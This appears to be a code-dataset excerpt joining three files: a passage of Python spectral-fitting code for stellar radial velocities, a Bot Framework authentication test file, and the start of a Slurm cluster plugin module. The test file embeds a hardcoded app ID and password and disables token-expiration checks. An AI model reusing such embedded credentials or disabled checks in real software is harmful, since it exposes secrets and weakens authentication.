m = modlist[i]([teff,logg,feh],rv=vrel[i])
if m is not None:
flux[cnt:cnt+npx] = m.flux.T.flatten()
else:
flux[cnt:cnt+npx] = 1e30
cnt += npx
return flux
def multispec_interp_jac(x,*argv):
""" Compute the Jacobian matrix (an m-by-n matrix, where element (i, j)
is the partial derivative of f[i] with respect to x[j]). """
# We only have to recompute the full model if teff/logg/feh are being modified
# otherwise we just modify one spectrum's model
#print('jac')
#print(argv)
relstep = 0.02
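        # Use a 2% relative step for the stellar parameters; the RVs use a fixed
        # 1 km/s step in the per-spectrum loop below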
npix = len(x)
npar = len(argv)
teff = argv[0]
logg = argv[1]
feh = argv[2]
vrel = argv[3:]
# Initialize jacobian matrix
jac = np.zeros((npix,npar),float)
# Model at current values
f0 = multispec_interp(x,*argv)
# Compute full models for teff/logg/feh
for i in range(3):
pars = np.array(copy.deepcopy(argv))
step = relstep*pars[i]
pars[i] += step
f1 = multispec_interp(x,*pars)
# Hit an edge, try the negative value instead
nbd = np.sum(f1>1000)
if nbd>1000:
pars = np.array(copy.deepcopy(argv))
step = -relstep*pars[i]
pars[i] += step
f1 = multispec_interp(x,*pars)
jac[:,i] = (f1-f0)/step
# Compute model for single spectra
nspec = len(speclist)
cnt = 0
for i in range(nspec):
vrel1 = vrel[i]
step = 1.0
vrel1 += step
npx = speclist[i].npix*speclist[i].norder
m = modlist[i]([teff,logg,feh],rv=vrel1)
if m is not None:
                jac[cnt:cnt+npx,3+i] = (m.flux.T.flatten()-f0[cnt:cnt+npx])/step
else:
                jac[cnt:cnt+npx,3+i] = 1e30
cnt += npx
return jac
# We are fitting 3 stellar parameters and Nspec relative RVs
# Put all of the spectra into a large 1D array
ntotpix = 0
for s in speclist:
ntotpix += s.npix*s.norder
wave = np.zeros(ntotpix)
flux = np.zeros(ntotpix)
err = np.zeros(ntotpix)
cnt = 0
for i in range(nspec):
sp = speclist[i]
npx = sp.npix*sp.norder
wave[cnt:cnt+npx] = sp.wave.T.flatten()
flux[cnt:cnt+npx] = sp.flux.T.flatten()
err[cnt:cnt+npx] = sp.err.T.flatten()
cnt += npx
# Use curve_fit
diff_step = np.zeros(npar,float)
diff_step[:] = 0.02
lspars, lscov = curve_fit(multispec_interp, wave, flux, sigma=err, p0=initpar, bounds=bounds, jac=multispec_interp_jac)
#lspars, lscov = curve_fit(multispec_interp, wave, flux, sigma=err, p0=initpar, bounds=bounds, diff_step=diff_step)
#lspars, lscov = curve_fit(multispec_interp, wave, flux, sigma=err, p0=initpar, bounds=bounds)
    # If it hits a boundary then the solution won't change much compared to initpar
# setting absolute_sigma=True gives crazy low lsperror values
lsperror = np.sqrt(np.diag(lscov))
if verbose is True:
print('Least Squares RV and stellar parameters:')
printpars(lspars)
lsmodel = multispec_interp(wave,*lspars)
lschisq = np.sqrt(np.sum(((flux-lsmodel)/err)**2)/len(lsmodel))
if verbose is True: print('chisq = %5.2f' % lschisq)
# Put it into the output structure
dtype = np.dtype([('pars',float,npar),('parerr',float,npar),('parcov',float,(npar,npar)),('chisq',float)])
out = np.zeros(1,dtype=dtype)
out['pars'] = lspars
out['parerr'] = lsperror
out['parcov'] = lscov
out['chisq'] = lschisq
return out, lsmodel
def jointfit_cannon(speclist,models=None,mcmc=False,snrcut=10.0,saveplot=False,verbose=False,
outdir=None,nthreads=None,notweak=False,tpoly=False,tpolyorder=3):
"""
This fits a Cannon model to multiple spectra of the same star.
Parameters
----------
    speclist : list of Spec1D objects
        List of observed spectra of the same star to fit.
models : list of Cannon models, optional
A list of Cannon models to use. The default is to load all of the Cannon
models in the data/ directory and use those.
mcmc : bool, optional
Run Markov Chain Monte Carlo (MCMC) to get improved parameter uncertainties.
        This is only run when the individual spectra are being fit.
This is False by default.
snrcut : int, optional
S/N cut to fit individual spectra in the first step. The default is snrcut=10.
saveplot : bool, optional
Save output plots.
verbose : bool, optional
Verbose output of the various steps. This is False by default.
outdir : str, optional
The directory for output files. The default is to use the current directory.
nthreads : int, optional
The number of threads to use. By default the number of threads is not limited.
notweak : boolean, optional
Don't tweak the observed continuum using the model. Default is False.
tpoly : boolean, optional
Use a low-order polynomial fit for continuum tweaking. Default is False,
it uses Gaussian smoothing instead.
tpolyorder : int, optional
Polynomial order to use for continuum tweaking if tpoly=True.
Default is 3 (cubic).
Returns
-------
sumstr : numpy structured array
Summary catalog of final best-fit values.
    final : numpy structured array
        Final best-fit values for each individual spectrum.
bmodel : List of Spec1D object
List of best-fitting model spectra.
specmlist : list of Spec1D object
        List of the observed spectra with discrepant and outlier pixels masked.
Example
-------
.. code-block:: python
sumstr, final, bmodel, specmlist = jointfit_cannon(speclist)
"""
print = utils.getprintfunc() # Get print function to be used locally, allows for easy logging
nspec = len(speclist)
t0 = time.time()
# Set threads
if nthreads is not None:
os.environ["OMP_NUM_THREADS"] = str(nthreads)
os.environ["OPENBLAS_NUM_THREADS"] = str(nthreads)
os.environ["MKL_NUM_THREADS"] = str(nthreads)
os.environ["VECLIB_MAXIMUM_THREADS"] = str(nthreads)
os.environ["NUMEXPR_NUM_THREADS"] = str(nthreads)
if verbose: print('Jointly fitting Cannon model to '+str(nspec)+' spectra with parameters: '+
', '.join(['Teff','logg','[Fe/H]'])+' and RV for each spectrum')
# If list of filenames input, then load them
# Creating catalog of info on each spectrum
dt = np.dtype([('filename',np.str,300),('snr',float),('vhelio',float),('vrel',float),('vrelerr',float),
('teff',float),('tefferr',float),('logg',float),('loggerr',float),('feh',float),
('feherr',float),('chisq',float),('bc',float)])
info = np.zeros(nspec,dtype=dt)
for n in dt.names: info[n] = np.nan
for i,s in enumerate(speclist):
info['filename'][i] = s.filename
info['snr'][i] = s.snr
# Make sure some spectra pass the S/N cut
hisnr, nhisnr = dln.where(info['snr']>snrcut)
if nhisnr < np.ceil(0.25*nspec):
snr = np.flip(np.sort(info['snr']))
snrcut = snr[np.maximum(np.int(np.ceil(0.25*nspec)),np.minimum(4,nspec-1))]
if verbose is True:
print('Lowering S/N cut to %5.1f so at least 25%% of the spectra pass the cut' % snrcut)
# Step 1) Loop through each spectrum and run fit()
if verbose is True: print('Step #1: Fitting the individual spectra')
specmlist = []
modlist = []
for i in range(len(speclist)):
spec = speclist[i].copy()
if verbose is True:
print('Fitting spectrum '+str(i+1))
print(speclist[i].filename)
        # Only fit spectra with S/N above the snrcut threshold
if spec.snr>snrcut:
# Save the plot, figure the output figure filename
figfile = None
if saveplot is True:
fdir, base, ext = utils.splitfilename(speclist[i].filename)
figfile = base+'_dopfit.png'
if outdir is not None: figfile = outdir+'/'+figfile
if (outdir is None) & (fdir != ''): figfile = fdir+'/'+figfile
# Fit the spectrum
out, model, specm, pmodels = fit_cannon(spec,verbose=verbose,mcmc=mcmc,figfile=figfile,
retpmodels=True,notweak=notweak,tpoly=tpoly,
tpolyorder=tpolyorder)
modlist.append(pmodels.copy())
del pmodels
specmlist.append(specm.copy())
del specm
info['vhelio'][i] = out['vhelio']
info['vrel'][i] = out['vrel']
info['vrelerr'][i] = out['vrelerr']
info['teff'][i] = out['teff']
info['tefferr'][i] = out['tefferr']
info['logg'][i] = out['logg']
info['loggerr'][i] = out['loggerr']
info['feh'][i] = out['feh']
info['feherr'][i] = out['feherr']
info['chisq'][i] = out['chisq']
info['bc'][i] = out['bc']
else:
if verbose is True:
print('Skipping: S/N=%6.1f below threshold of %6.1f. Loading spectrum and preparing models.' % (spec.snr,snrcut))
            # Prepare a copy of the Cannon models for this spectrum; prepare() is used
            # in-place elsewhere in this module, so don't rely on its return value
            pmodels = cannon.models.copy()
            pmodels.prepare(speclist[i])
            modlist.append(pmodels)
sp = speclist[i].copy()
sp = utils.specprep(sp) # mask and normalize
# Mask outliers
sp = utils.maskoutliers(sp)
specmlist.append(sp)
# at least need BC
info['bc'][i] = speclist[i].barycorr()
if verbose is True: print(' ')
# Step 2) Find weighted stellar parameters
if verbose is True: print('Step #2: Getting weighted stellar parameters')
gd, ngd = dln.where(np.isfinite(info['chisq']))
if ngd>0:
pars = ['teff','logg','feh','vhelio']
parerr = ['tefferr','loggerr','feherr','vrelerr']
wtpars = np.zeros(4,float)
for i in range(len(pars)):
p = info[pars[i]][gd]
perr = info[parerr[i]][gd]
gdp,ngdp,bdp,nbdp = dln.where(perr > 0.0,comp=True)
# Weighted by 1/perr^2
if ngdp>0:
if (nbdp>0): perr[bdp] = np.max(perr[gdp])*2
mnp = dln.wtmean(p,perr)
wtpars[i] = mnp
# Unweighted
else:
wtpars[i] = np.mean(p)
if verbose is True:
print('Initial weighted parameters are:')
printpars(wtpars)
else:
wtpars = np.zeros(4,float)
wtpars[0] = 6000.0
wtpars[1] = 4.0
wtpars[2] = -0.5
wtpars[3] = 0.0
vscatter0 = 999999.
if verbose is True:
            print('No good fits. Using these as initial guesses:')
printpars(wtpars)
    # Make initial guesses for all the parameters, 3 stellar parameters and Nspec relative RVs
initpar1 = np.zeros(3+nspec,float)
initpar1[0:3] = wtpars[0:3]
# the default is to use mean vhelio + BC for all visit spectra
initpar1[3:] = wtpars[3]-info['bc'] # vhelio = vrel + BC
# Use the Vrel values from the initial fitting if they are accurate enough
gdinit,ngdinit = dln.where(np.isfinite(info['vrel']) & (info['snr']>5))
if ngdinit>0:
initpar1[gdinit+3] = info['vrel'][gdinit]
# Step 3) Refit all spectra simultaneously fitting stellar parameters and RVs
if verbose is True:
print(' ')
print('Step #3: Fitting all spectra simultaneously')
out1, fmodels1 = multifit_lsq_cannon(specmlist,modlist,initpar1)
stelpars1 = out1['pars'][0,0:3]
stelparerr1 = out1['parerr'][0,0:3]
vrel1 = out1['pars'][0,3:]
vrelerr1 = out1['parerr'][0,3:]
vhelio1 = vrel1+info['bc']
medvhelio1 = np.median(vhelio1)
vscatter1 = dln.mad(vhelio1)
verr1 = vscatter1/np.sqrt(nspec)
if verbose is True:
print('Parameters:')
printpars(stelpars1)
print('Vhelio = %6.2f +/- %5.2f km/s' % (medvhelio1,verr1))
print('Vscatter = %6.3f km/s' % vscatter1)
print(vhelio1)
# Step 4) Tweak continua and remove outliers
if verbose is True:
print(' ')
print('Step #4: Tweaking continuum and masking outliers')
if notweak is False:
for i,spm in enumerate(specmlist):
bestm = modlist[i](stelpars1,rv=vrel1[i])
# Tweak the continuum normalization
spm = tweakcontinuum(spm,bestm,usepoly=tpoly,polyorder=tpolyorder)
# Mask out very discrepant pixels when compared to the best-fit model
spm = utils.maskdiscrepant(spm,bestm,verbose=verbose)
specmlist[i] = spm.copy()
else:
if verbose: print('Skipping tweaking')
# Step 5) Refit all spectra simultaneously fitting stellar parameters and RVs
if verbose is True:
print(' ')
print('Step #5: Re-fitting all spectra simultaneously')
    # Initial guesses for all the parameters, 3 stellar parameters and Nspec relative RVs
initpar2 = out1['pars'][0]
out2, fmodels2 = multifit_lsq_cannon(specmlist,modlist,initpar2)
stelpars2 = out2['pars'][0,0:3]
stelparerr2 = out2['parerr'][0,0:3]
vrel2 = out2['pars'][0,3:]
vrelerr2 = out2['parerr'][0,3:]
vhelio2 = vrel2+info['bc']
medvhelio2 = np.median(vhelio2)
vscatter2 = dln.mad(vhelio2)
verr2 = vscatter2/np.sqrt(nspec)
if verbose is True:
print('Final parameters:')
printpars(stelpars2)
print('Vhelio = %6.2f +/- %5.2f km/s' % (medvhelio2,verr2))
print('Vscatter = %6.3f km/s' % vscatter2)
print(vhelio2)
# Final output structure
final = info.copy()
final['teff'] = stelpars2[0]
final['tefferr'] = stelparerr2[0]
final['logg'] = stelpars2[1]
final['loggerr'] = stelparerr2[1]
final['feh'] = stelpars2[2]
final['feherr'] = stelparerr2[2]
final['vrel'] = vrel2
final['vrelerr'] = vrelerr2
final['vhelio'] = vhelio2
bmodel = []
totchisq = 0.0
totnpix = 0
for i in range(nspec):
pars1 = [final['teff'][i], final['logg'][i], final['feh'][i]]
vr1 = final['vrel'][i]
sp = specmlist[i]
m = modlist[i](pars1,rv=vr1)
chisq = np.sqrt(np.sum(((sp.flux-m.flux)/sp.err)**2)/(sp.npix*sp.norder))
totchisq += np.sum(((sp.flux-m.flux)/sp.err)**2)
totnpix += sp.npix*sp.norder
final['chisq'][i] = chisq
bmodel.append(m)
totchisq = np.sqrt(totchisq/totnpix)
# Average values
sumdt = np.dtype([('medsnr',float),('totsnr',float),('vhelio',float),('vscatter',float),('verr',float),
('teff',float),('tefferr',float),('logg',float),('loggerr',float),('feh',float),
('feherr',float),('chisq',float)])
sumstr = np.zeros(1,dtype=sumdt)
sumstr['medsnr'] = np.median(info['snr'])
sumstr['totsnr'] = np.sqrt(np.sum(info['snr']**2))
sumstr['vhelio'] = medvhelio2
sumstr['vscatter'] = vscatter2
sumstr['verr'] = verr2
sumstr['teff'] = stelpars2[0]
sumstr['tefferr'] = stelparerr2[0]
sumstr['logg'] = stelpars2[1]
sumstr['loggerr'] = stelparerr2[1]
sumstr['feh'] = stelpars2[2]
sumstr['feherr'] = stelparerr2[2]
sumstr['chisq'] = totchisq
# Save the best-fitting plots
if saveplot is True:
if verbose is True:
print('')
print('Making best-fit plots for each spectrum')
pdfnames = []
specfiles = [s.filename for s in speclist]
for i,f in enumerate(specfiles):
# Figure the output figure filename
fdir,base,ext = utils.splitfilename(speclist[i].filename)
figname = base+'_dopjointfit.png'
if outdir is not None: figname = outdir+'/'+figname
if (outdir is None) & (fdir != ''): figname = fdir+'/'+figname
# Make the plot
spec = speclist[i]
specm = specmlist[i]
fmodel = bmodel[i]
fout = final[i]
# Apply continuum tweak to original spectrum as well
orig = spec.copy()
if orig.normalized is False: orig.normalize()
cratio = specm.cont/orig.cont
orig.flux /= cratio
orig.err /= cratio
orig.cont *= cratio
specfigure(figname,specm,fmodel,fout,original=orig,verbose=True)
# Make a PDF version that we will combine at the end
fignamepdf = figname.replace('.png','.pdf')
specfigure(fignamepdf,specm,fmodel,fout,original=orig,verbose=False)
pdfnames.append(fignamepdf)
# Combine the PDFs into one
fdir,base,ext = utils.splitfilename(specfiles[0])
combname = base+'_dopjointfit_comb.pdf' # png
if outdir is not None: combname = outdir+'/'+combname
if (outdir is None) & (fdir != ''): combname = fdir+'/'+combname
if os.path.exists(combname): os.remove(combname)
cmd = ['gs','-dBATCH','-dNOPAUSE','-q','-sDEVICE=pdfwrite','-sOutputFile='+combname]
cmd = cmd+pdfnames
try:
            out = subprocess.check_call(cmd,stderr=subprocess.STDOUT,shell=False)
if verbose: print('Combined plots saved to '+combname)
except subprocess.CalledProcessError:
raise Exception("Could not combine PDFs with ghostscript")
# Delete individual PDFs
for fp in pdfnames: os.remove(fp)
# How long did this take
if verbose is True: print('dt = %5.2f sec.' % (time.time()-t0))
return sumstr, final, bmodel, specmlist
######################### MAIN PROGRAMS ###########################
def fit(spectrum,models=None,fitparams=None,fixparams={},payne=False,verbose=False,
mcmc=False,figfile=None,cornername=None,retpmodels=False,nthreads=None,
timestamp=False,notweak=False,tpoly=False,tpolyorder=3):
"""
    Fit the spectrum. Find the best RV and stellar parameters using Cannon or Payne models.
Parameters
----------
spectrum : Spec1D object
The observed spectrum to match.
models : list of Cannon models or Payne model, optional
A list of Cannon models or a Payne model to use. The default is to load
the models in the data/ directory and use those.
fitparams : list, optional
List of Payne labels to fit.
fixparams : dict, optional
Dictionary of Payne labels to hold fixed.
payne : bool, optional
Fit a Payne model. By default, a Cannon model is used.
verbose : bool, optional
Verbose output of the various steps. This is False by default.
mcmc : bool, optional
Run Markov Chain Monte Carlo (MCMC) to get improved parameter uncertainties.
This is False by default.
figfile : string, optional
The filename for a diagnostic plot showing the observed spectrum, model
spectrum and the best-fit parameters.
cornername : string, optional
The filename for a "corner" plot showing the posterior distributions from
the MCMC run.
retpmodels : bool, optional
Return the prepared models (only if Cannon models used).
nthreads : int, optional
The number of threads to use. By default the number of threads is not limited.
timestamp : boolean, optional
Add timestamp in verbose output (if verbose=True). Default is False.
notweak : boolean, optional
Don't tweak the observed continuum using the model. Default is False.
tpoly : boolean, optional
Use a low-order polynomial fit for continuum tweaking. Default is False,
it uses Gaussian smoothing instead.
tpolyorder : int, optional
Polynomial order to use for continuum tweaking if tpoly=True.
Default is 3 (cubic).
Returns
-------
out : numpy structured array
The output structured array of the final derived RVs, stellar parameters and errors.
    model : Spec1D object
        The best-fitting model spectrum (as Spec1D object).
specm : Spec1D object
The observed spectrum with discrepant and outlier pixels masked.
pmodels : DopplerCannonModelSet
The prepared Doppler Cannon models, only if retpmodels=True.
Example
-------
.. code-block:: python
out, model = fit(spec)
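
    A slightly fuller sketch; the reader call and filename below are illustrative
    assumptions, not part of this function's interface:

    .. code-block:: python

        spec = doppler.read('myspectrum.fits')   # hypothetical input file
        out, model, specm = fit(spec, verbose=True)
        print(out['vhelio'], out['teff'])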
"""
# Set up the logger
if timestamp and verbose:
logger = dln.basiclogger()
logger.handlers[0].setFormatter(logging.Formatter("%(asctime)s [%(levelname)-5.5s] %(message)s"))
logger.handlers[0].setStream(sys.stdout)
builtins.logger = logger # make it available globally across all modules
# Cannon model
if payne == False:
out = fit_cannon(spectrum,models=models,verbose=verbose,mcmc=mcmc,figfile=figfile,
cornername=cornername,retpmodels=retpmodels,nthreads=nthreads,
notweak=notweak,tpoly=tpoly,tpolyorder=tpolyorder)
# Payne model
else:
out = fit_payne(spectrum,model=models,fitparams=fitparams,fixparams=fixparams,
verbose=verbose,mcmc=mcmc,figfile=figfile,
cornername=cornername,nthreads=nthreads,
notweak=notweak,tpoly=tpoly,tpolyorder=tpolyorder)
    # Tear down the logger
if timestamp and verbose:
del builtins.logger
return out
def jointfit(speclist,models=None,fitparams=None,fixparams={},mcmc=False,snrcut=10.0,
saveplot=False,verbose=False,outdir=None,nthreads=None,payne=False,
timestamp=False,notweak=False,tpoly=False,tpolyorder=3):
"""
This fits a Cannon or Payne model to multiple spectra of the same star.
Parameters
----------
    speclist : list of Spec1D objects
        List of observed spectra of the same star to fit.
models : Cannon or Payne model(s), optional
A list of Cannon models or Payne model to use. The default is to load all
the Cannon or Payne models (depending on if payne=True is set) in the data/
directory and use those.
fitparams : list, optional
List of Payne labels to fit.
fixparams : dict, optional
Dictionary of Payne labels to hold fixed.
mcmc : bool, optional
Run Markov Chain Monte Carlo (MCMC) to get improved parameter uncertainties.
        This is only run when the individual spectra are being fit.
This is False by default.
snrcut : int, optional
S/N cut to fit individual spectra in the first step. The default is snrcut=10.
saveplot : bool, optional
Save output plots.
verbose : bool, optional
Verbose output of the various steps. This is False by default.
outdir : str, optional
The directory for output files. The default is to use the current directory.
nthreads : int, optional
The number of threads to use. By default the number of threads is not limited.
payne : bool, optional
Fit a Payne model. By default, a Cannon model is used.
timestamp : boolean, optional
Add timestamp in verbose output (if verbose=True). Default is False.
notweak : boolean, optional
Don't tweak the observed continuum using the model. Default is False.
tpoly : boolean, optional
Use a low-order polynomial fit for continuum tweaking. Default is False,
it uses Gaussian smoothing instead.
tpolyorder : int, optional
Polynomial order to use for continuum tweaking if tpoly=True.
Default is 3 (cubic).
Returns
-------
sumstr : numpy structured array
Summary catalog of final best-fit values.
final :
Final best-fit values for each individual spectrum.
bmodel : list of Spec1D objects
List of best-fitting model spectra.
specmlist : list of Spec1D objects
List of the observed spectra with discrepant and outlier pixels masked.
Example
-------
.. code-block:: python
sumstr, final, bmodel, specmlist = jointfit(speclist)
"""
# Set up the logger
if timestamp and verbose:
logger = dln.basiclogger()
logger.handlers[0].setFormatter(logging.Formatter("%(asctime)s [%(levelname)-5.5s] %(message)s"))
logger.handlers[0].setStream(sys.stdout)
builtins.logger = logger # make it available globally across all modules
# Cannon model
if payne == False:
out = jointfit_cannon(speclist,models=models,mcmc=mcmc,snrcut=snrcut,
saveplot=saveplot,verbose=verbose,outdir=outdir,
nthreads=nthreads,notweak=notweak,tpoly=tpoly,
tpolyorder=tpolyorder)
# Payne model
else:
out = jointfit_payne(speclist,model=models,fitparams=fitparams,fixparams=fixparams,
mcmc=mcmc,snrcut=snrcut,saveplot=saveplot,verbose=verbose,
outdir=outdir,nthreads=nthreads,notweak=notweak,tpoly=tpoly,
tpolyorder=tpolyorder)
# Tear down the logger
if timestamp and verbose:
del builtins.logger
return out
| 38.698827
| 160
| 0.591468
|
451e90bea550796fa188607b230a6bfea10dd926
| 6,865
|
py
|
Python
|
libraries/botframework-connector/tests/test_auth.py
|
awaemmanuel/botbuilder-python
|
bcc85a49f1426ccf682205566fd03937ee6d315c
|
[
"MIT"
] | 1
|
2019-05-31T10:55:15.000Z
|
2019-05-31T10:55:15.000Z
|
libraries/botframework-connector/tests/test_auth.py
|
awaemmanuel/botbuilder-python
|
bcc85a49f1426ccf682205566fd03937ee6d315c
|
[
"MIT"
] | null | null | null |
libraries/botframework-connector/tests/test_auth.py
|
awaemmanuel/botbuilder-python
|
bcc85a49f1426ccf682205566fd03937ee6d315c
|
[
"MIT"
] | null | null | null |
import pytest
from botbuilder.schema import Activity
from botframework.connector.auth import JwtTokenValidation
from botframework.connector.auth import SimpleCredentialProvider
from botframework.connector.auth import EmulatorValidation
from botframework.connector.auth import ChannelValidation
from botframework.connector.auth import MicrosoftAppCredentials
class TestAuth:
EmulatorValidation.TO_BOT_FROM_EMULATOR_TOKEN_VALIDATION_PARAMETERS.ignore_expiration = True
ChannelValidation.TO_BOT_FROM_CHANNEL_TOKEN_VALIDATION_PARAMETERS.ignore_expiration = True
@pytest.mark.asyncio
async def test_connector_auth_header_correct_app_id_and_service_url_should_validate(self):
header = 'Bearer ' + await MicrosoftAppCredentials('2cd87869-38a0-4182-9251-d056e8f0ac24', '2.30Vs3VQLKt974F').get_access_token()
credentials = SimpleCredentialProvider('2cd87869-38a0-4182-9251-d056e8f0ac24', '')
result = await JwtTokenValidation.validate_auth_header(header, credentials, '', 'https://webchat.botframework.com/')
assert result
@pytest.mark.asyncio
async def test_connector_auth_header_with_different_bot_app_id_should_not_validate(self):
header = 'Bearer ' + await MicrosoftAppCredentials('2cd87869-38a0-4182-9251-d056e8f0ac24', '2.30Vs3VQLKt974F').get_access_token()
credentials = SimpleCredentialProvider('00000000-0000-0000-0000-000000000000', '')
with pytest.raises(Exception) as excinfo:
await JwtTokenValidation.validate_auth_header(header, credentials, '', 'https://webchat.botframework.com/')
assert 'Unauthorized' in str(excinfo.value)
@pytest.mark.asyncio
async def test_connector_auth_header_and_no_credential_should_not_validate(self):
header = 'Bearer ' + await MicrosoftAppCredentials('2cd87869-38a0-4182-9251-d056e8f0ac24', '2.30Vs3VQLKt974F').get_access_token()
credentials = SimpleCredentialProvider('', '')
with pytest.raises(Exception) as excinfo:
await JwtTokenValidation.validate_auth_header(header, credentials, '', 'https://webchat.botframework.com/')
assert 'Unauthorized' in str(excinfo.value)
@pytest.mark.asyncio
async def test_empty_header_and_no_credential_should_validate(self):
header = ''
credentials = SimpleCredentialProvider('', '')
with pytest.raises(Exception) as excinfo:
await JwtTokenValidation.validate_auth_header(header, credentials, '', None)
assert 'auth_header' in str(excinfo.value)
@pytest.mark.asyncio
async def test_emulator_msa_header_correct_app_id_and_service_url_should_validate(self):
header = 'Bearer ' + await MicrosoftAppCredentials('2cd87869-38a0-4182-9251-d056e8f0ac24', '2.30Vs3VQLKt974F').get_access_token()
credentials = SimpleCredentialProvider('2cd87869-38a0-4182-9251-d056e8f0ac24', '')
result = await JwtTokenValidation.validate_auth_header(header, credentials, '', 'https://webchat.botframework.com/')
assert result
@pytest.mark.asyncio
async def test_emulator_msa_header_and_no_credential_should_not_validate(self):
header = 'Bearer ' + await MicrosoftAppCredentials('2cd87869-38a0-4182-9251-d056e8f0ac24', '2.30Vs3VQLKt974F').get_access_token()
credentials = SimpleCredentialProvider('00000000-0000-0000-0000-000000000000', '')
with pytest.raises(Exception) as excinfo:
await JwtTokenValidation.validate_auth_header(header, credentials, '', None)
assert 'Unauthorized' in str(excinfo.value)
@pytest.mark.asyncio
# Tests with a valid Token and service url; and ensures that Service url is added to Trusted service url list.
async def test_channel_msa_header_Valid_service_url_should_be_trusted(self):
activity = Activity(service_url = 'https://smba.trafficmanager.net/amer-client-ss.msg/')
header = 'Bearer ' + await MicrosoftAppCredentials('2cd87869-38a0-4182-9251-d056e8f0ac24', '2.30Vs3VQLKt974F').get_access_token()
credentials = SimpleCredentialProvider('2cd87869-38a0-4182-9251-d056e8f0ac24', '')
await JwtTokenValidation.authenticate_request(activity, header, credentials)
assert MicrosoftAppCredentials.is_trusted_service('https://smba.trafficmanager.net/amer-client-ss.msg/')
@pytest.mark.asyncio
async def test_channel_msa_header_from_user_specified_tenant(self):
activity = Activity(service_url = 'https://smba.trafficmanager.net/amer-client-ss.msg/')
header = 'Bearer ' + await MicrosoftAppCredentials('2cd87869-38a0-4182-9251-d056e8f0ac24', '2.30Vs3VQLKt974F', 'microsoft.com').get_access_token(True)
credentials = SimpleCredentialProvider('2cd87869-38a0-4182-9251-d056e8f0ac24', '')
claims = await JwtTokenValidation.authenticate_request(activity, header, credentials)
assert claims.get_claim_value("tid") == '72f988bf-86f1-41af-91ab-2d7cd011db47'
@pytest.mark.asyncio
# Tests with a valid Token and invalid service url; and ensures that Service url is NOT added to Trusted service url list.
async def test_channel_msa_header_invalid_service_url_should_not_be_trusted(self):
activity = Activity(service_url = 'https://webchat.botframework.com/')
header = 'Bearer ' + await MicrosoftAppCredentials('2cd87869-38a0-4182-9251-d056e8f0ac24', '2.30Vs3VQLKt974F').get_access_token()
credentials = SimpleCredentialProvider('7f74513e-6f96-4dbc-be9d-9a81fea22b88', '')
with pytest.raises(Exception) as excinfo:
await JwtTokenValidation.authenticate_request(activity, header, credentials)
assert 'Unauthorized' in str(excinfo.value)
assert not MicrosoftAppCredentials.is_trusted_service('https://webchat.botframework.com/')
@pytest.mark.asyncio
# Tests with no authentication header and makes sure the service URL is not added to the trusted list.
async def test_channel_authentication_disabled_should_be_anonymous(self):
activity = Activity(service_url = 'https://webchat.botframework.com/')
header = ''
credentials = SimpleCredentialProvider('', '')
claimsPrincipal = await JwtTokenValidation.authenticate_request(activity, header, credentials)
assert claimsPrincipal is None
@pytest.mark.asyncio
# Tests with no authentication header and makes sure the service URL is not added to the trusted list.
async def test_channel_authentication_disabled_service_url_should_not_be_trusted(self):
activity = Activity(service_url = 'https://webchat.botframework.com/')
header = ''
credentials = SimpleCredentialProvider('', '')
await JwtTokenValidation.authenticate_request(activity, header, credentials)
assert not MicrosoftAppCredentials.is_trusted_service('https://webchat.botframework.com/')
| 58.675214
| 158
| 0.75295
|
4c056a7c6bfe871f925cd90d9aab06e383ec131b
| 339
|
py
|
Python
|
superadmin/urls.py
|
nkmrohit/python
|
bd644d51909cda548684b5da98eab998564f3568
|
[
"Apache-2.0"
] | null | null | null |
superadmin/urls.py
|
nkmrohit/python
|
bd644d51909cda548684b5da98eab998564f3568
|
[
"Apache-2.0"
] | null | null | null |
superadmin/urls.py
|
nkmrohit/python
|
bd644d51909cda548684b5da98eab998564f3568
|
[
"Apache-2.0"
] | null | null | null |
from django.contrib import admin
from django.conf.urls import include, url
from django.urls import path
from django.conf import settings
from django.conf.urls.static import static
import authUser.views
urlpatterns = [
url('auth/', include('adminauth.urls')),
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| 21.1875
| 65
| 0.769912
|
8ff42132c461b74eb57d15e0f6df1f38c7d55644
| 20,290
|
py
|
Python
|
src/slurm_plugin/slurm_resources.py
|
lukeseawalker/cfncluster-node
|
0c7619a6440a5848a1d0bb3ff88c33b197055a48
|
[
"Apache-2.0"
] | 33
|
2018-11-14T14:54:47.000Z
|
2022-03-22T23:47:51.000Z
|
src/slurm_plugin/slurm_resources.py
|
gmarciani/aws-parallelcluster-node
|
ab77de979f429676ef228a49fecd3cf28a6eec4c
|
[
"Apache-2.0"
] | 180
|
2019-02-21T09:33:10.000Z
|
2022-03-31T08:01:28.000Z
|
src/slurm_plugin/slurm_resources.py
|
gmarciani/aws-parallelcluster-node
|
ab77de979f429676ef228a49fecd3cf28a6eec4c
|
[
"Apache-2.0"
] | 35
|
2019-02-06T13:36:18.000Z
|
2022-03-01T12:54:05.000Z
|
# Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance
# with the License. A copy of the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "LICENSE.txt" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES
# OR CONDITIONS OF ANY KIND, express or implied. See the License for the specific language governing permissions and
# limitations under the License.
import logging
import re
from abc import ABCMeta, abstractmethod
from enum import Enum
from common.utils import time_is_up
logger = logging.getLogger(__name__)
# Possible ec2 health status: 'ok'|'impaired'|'insufficient-data'|'not-applicable'|'initializing'
EC2_HEALTH_STATUS_UNHEALTHY_STATES = {"impaired"}
# Possible instance states: 'pending'|'running'|'shutting-down'|'terminated'|'stopping'|'stopped'
EC2_INSTANCE_HEALTHY_STATES = {"pending", "running"}
EC2_INSTANCE_STOP_STATES = {"stopping", "stopped"}
EC2_INSTANCE_ALIVE_STATES = EC2_INSTANCE_HEALTHY_STATES | EC2_INSTANCE_STOP_STATES
EC2_SCHEDULED_EVENT_CODES = [
"instance-reboot",
"system-reboot",
"system-maintenance",
"instance-retirement",
"instance-stop",
]
CONFIG_FILE_DIR = "/etc/parallelcluster/slurm_plugin"
class EC2Instance:
def __init__(self, id, private_ip, hostname, launch_time):
"""Initialize slurm node with attributes."""
self.id = id
self.private_ip = private_ip
self.hostname = hostname
self.launch_time = launch_time
self.slurm_node = None
def __eq__(self, other):
"""Compare 2 SlurmNode objects."""
if isinstance(other, EC2Instance):
return self.__dict__ == other.__dict__
return False
def __repr__(self):
attrs = ", ".join(["{key}={value}".format(key=key, value=repr(value)) for key, value in self.__dict__.items()])
return "{class_name}({attrs})".format(class_name=self.__class__.__name__, attrs=attrs)
def __str__(self):
